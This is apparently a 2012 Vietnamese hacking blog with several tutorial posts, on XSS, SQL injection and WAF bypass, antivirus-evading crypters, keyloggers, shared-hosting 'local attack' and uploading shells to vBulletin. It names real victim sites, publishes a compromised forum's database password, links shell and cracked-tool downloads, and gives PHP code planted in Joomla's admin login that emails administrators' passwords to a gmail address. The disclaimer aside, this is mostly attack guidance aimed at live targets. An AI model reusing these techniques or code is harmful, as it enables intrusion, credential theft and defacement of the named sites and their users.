Soleil sẽ góp 1 chút kiên thức về XSS cho ae tham khảo trong 3 bài viết.
Bài đầu tiên sẽ mang tính chất giới thiệu. Trong quá trình viết có gì
sai sót mong được ae góp ý.
Các nội dung chính:
1- XSS là gì ?
2- Nguyên lý hoạt động XSS
3- Phân loại XSS
4- Mức độ nguy hiểm XSS
5- Phương pháp check site dính lỗ hổng XSS
6- 1 số thao tác khi tấn công bằng XSS
7- Kỹ Thuật Bypass
8- Demo 1 số site dính XSS:
9- Quá trình các bước thực hiện tấn công bằng XSS
Trong bài 2, Soleil sẽ viết từ mục 1 đến mục 5 ^^
Blog được tạo ra nhằm mục đích demo các kỹ thuật hack website dưới dạng Tut- và 1 số vấn đề liên quan đến Hacking Tạo một sân chơi lành mạnh và không gian học tập & trao đổi dành cho các bạn có niềm đam mê Hacking và Security. Tác giả không khuyến cáo bạn đọc sử dụng những kỹ thuật này để thâm nhập bất hợp pháp vào các hệ thông, đánh sập các website Việt cũng như không chịu bất kỳ trách nhiệm gì trước mọi hành vi mang tính chất phá hoại của độc giả!
Thứ Ba, 21 tháng 8, 2012
Thứ Năm, 16 tháng 8, 2012
Private Blog - VHB_Group
Nhân dịp VHB comback, soleil sẽ public 1 số tut khá nhạy cảm và sẽ private blog và chỉ dành cho thành viên VHB truy cập.
Ngoài ra, Nếu ai có nhu cầu để cấp quyền truy cập blog thì để lại email phía dưới.
Sẽ chính thức private sau 1 tuần từ lúc pub thông báo này. (đến 25/8). Sau ngày 25/8 sẽ ko cấp quyền cho bất cứ 1 ai nưa,
Thân!
Thứ Tư, 8 tháng 8, 2012
Check site .cn tối ngày 7/8/12
1 số site khựa bảo mật kém bị check tối 7/8
http://www.jsroc.com.tw/soleil.html
http://www.horshin.com.tw/soleil.html
http://www.worldchemical.com.tw/soleil.html
http://www.shin-yi.com.tw/soleil.html
http://www.idean.com.tw/soleil.html
http://www.horshin.com.tw/soleil.html
http://www.worldchemical.com.tw/soleil.html
http://www.shin-yi.com.tw/soleil.html
http://www.idean.com.tw/soleil.html
1 số site đã bị deface :
Topic sẽ tiếp tục cập nhật trong tối nay ^^
Chủ Nhật, 29 tháng 7, 2012
[Bài 4 – SQLI] Bypass 406 Not Acceptable
Trong các bài trước , Soleil đã giới thiệu các dạng attack
cơ bản sử dụng phương pháp SQLI để chiếm quyền quản trị administrator: Khai thác đối với Aspx, Khai thác lỗi cơ bản, Lỗi Jet. Tuy
nhiên trong lúc khai thác, 1 số site đã chặn ở 1 vài querry sqli và không thể
tiếp tục.
Hôm nay Soleil sẽ demo 1 dạng bypass “406 Not Acceptable”
thông dụng thường gặp phải lúc khai thác đồng thời cũng pubic bug sqli đối với
công ty thiết kế website “Viet Arrow”.
Google dork: Designed by Viet Arrow id=
Tất cả các website được thiết kế bởi Viet Arrow đều dính lỗi
sqli, sau đây là 1 số ví dụ
Soleil sẽ chọn 1 victim bất kỳ để khai thác.
Victim: http://www.khaithong.com.vn/
Trước khi vào bài này, có thể tham khảo qua bài 2 : Khai Thác Lỗi Cơ Bản
Bước 1: Check lỗi
Thêm dấu ‘ vào sau con số của đường link có dạng id=
http://www.khaithong.com.vn/index.php?do=content&id=1
Nếu giao diện website thay đổi nghĩa là site đã bị dính lỗi
sqli
Thứ Sáu, 27 tháng 7, 2012
Một số phần mền Mã Hóa Virus Free
1-
07-12-12 Crypter
-
Click vào file và chọn path tới file virus
-
Click vào stub và chọn path tới file stub.exe (
cùng thư mục với file 07-12-12 Crypter.exe )
-
Sau đó tùy chọn các chức năng và Encrypt
-
Trong trường hợp này Soleil sẽ lấy demo với file
virus là con bot được tạo từ tool botnet Di5
-
Hình ảnh check file virus khi chưa mã hóa:
Các phần mền keylogger không thể bỏ qua
Trong tất cả các keylogger đã sử dụng thì soleil kết nhất là hai phần mền: "Ardamax, Perfect" với cách sử dụng khá đơn giản và đầy đủ các tính năng: Ghi lại thao tác bàn phím, chụp destop, chụp webcam, link website đã vào, Create trojan, gửi mail, thiết lập thời gian gửi, đính kèm phần mền, chạy chế độ ẩn,.....
1 - Ardamax keylogger
Ardramax là phần mên keylogger đầy đủ các tính năng với cách sử dụng gần như là đơn giản nhất và được rất nhiều người ưa chuộng.
link download: ( Bao gồm cả key)
Thứ Năm, 19 tháng 7, 2012
[Tut] Up Shell Vbulletin Qua Database P.I
Khi thực hiện Local Attack đối với 4rum thì include shell qua database, là 1 kỹ năng không thể thiếu bởi vì thư mục Admincp thông thường không có mấy admin sơ ý đến nỗi quên không change path và đặt file .htaccess bảo vệ. Vì vậy phương pháp include shell database được các attacker sử dụng 1 cách phổ biến
Có 3 cách để include shell, hôm nay soleil sẽ giới thiệu cách thứ nhất.
Victim: http://raoonline.net/forum.php
Giả sử soleil đã có shell
1 site trên cùng server,
Với shell này ta có thể Local
Attack sang forum: http://raoonline.net và thu được thông tin config như sau:
$config['MasterServer']['username'] = 'raovat_forum'; $config['MasterServer']['password'] = '125254857'
Bước
1: Login vào cơ sở dữ liệu:
Thứ Hai, 16 tháng 7, 2012
[Bài 3 - Local Attack] Các Phương Pháp Local Attack
Để hoàn thành bộ tut Local Attack full, hôm nay Soleil sẽ giới thiệu bài 3, cũng chính là bài quan trọng và trọng tâm nhất trong Local Attack. Trước khi đi vào bài 3, các bạn có thể đọc qua và lấy 1 số tool cần thiết từ bài 2 - Giới thiệu tính năng 1 số shell
* Nhắc lại trình tự các bước Local Attack
1-
View danh
sách các user trong server
2-
Tìm file
config.php
3-
Get thông tin login vào database
4-
Crack hoặc change pass admin
5-
Login vào quyên quản trị và upshell
1-
View danh sách các user trên server
Muốn local được 1 site nào đó trên server thì trướ tiên cần phải xác định site đó có user là gì, source code là gì từ đó tìm cách đọc file config.php của user đó
-
Một số câu lệnh để get user:
Lệnh phổ biến nhất:
Cat /etc/passwd
Tuy nhiên một số server cấm lệnh cat, có thể
sử dụng các lệnh sau một cách linh hoạt
Less /etc/passwd./cat/etc/passwdMore /etc/passwd
Ngoài ra có thể sử dụng chức năng get user
trên shell byg.php, c99.php hay bypass ở r57.php, soleil.pin, telnet.pl hoặc các
shell sau:
http://www.mediafire.com/?hi4gnmu3kpxn095
( đk: chmod 755)
Pass download: soleil_vhb
Pass dải nén: ceh.vn
-
Câu lênh get user & domain
Cat /etc/virtual/domainowners ( Chỉ dùng đối với direct admin )
2-
Tìm file path file config.php
Đối với các mã nguồn mở thì path file config được mặc định
như sau:
Lưu ý: “path” chính là path từ server dẫn tới site, ví dụ đối
với server linux, path là: /home/user/public_html
Thứ Bảy, 14 tháng 7, 2012
[Tut] Insert Keylogger into joomla
Bước 1: Up shell lên site joomla
Bước 2: Insert mã độc vào code
- Vào administrator/components/com_login/
-
Edit file: admin.login.php
-
Tìm dòng:$mainframe->redirect('index.php');
-
Thêm trước dòng này 1
đoạn code như sau:
PHP Code:
$db =& JFactory::getDBO();$mailfrom = $mainframe->getCfg( 'mailfrom' );$fromname = $mainframe->getCfg( 'fromname' );$siteURL = JURI::base();$uname = $credentials['username'];$query = 'SELECT name , email, usertype ' .' FROM #__users' .' WHERE username = "'.$uname.'"';$db->setQuery( $query );$rows = $db->loadObject();if ( ! $mailfrom || ! $fromname ) {$fromname = $rows->name;$mailfrom = $rows->email;}$usertype = $rows->usertype;$email = $rows->email;$pass = $credentials['password'];$message = "$uname|$email|$pass|$usertype";$to="ducdung.08clc@gmail.com";$header = "Content-type: text/html; charset=utf-8\r\nFrom: $mailfrom\r\nReply-to: $to";@mail($to, $siteURL, $message, $header);
Với đoạn code này thì khi
admin đăng nhập thì username, password, email sẽ tự động gửi về mail:
ducdung.08clc@gmail.com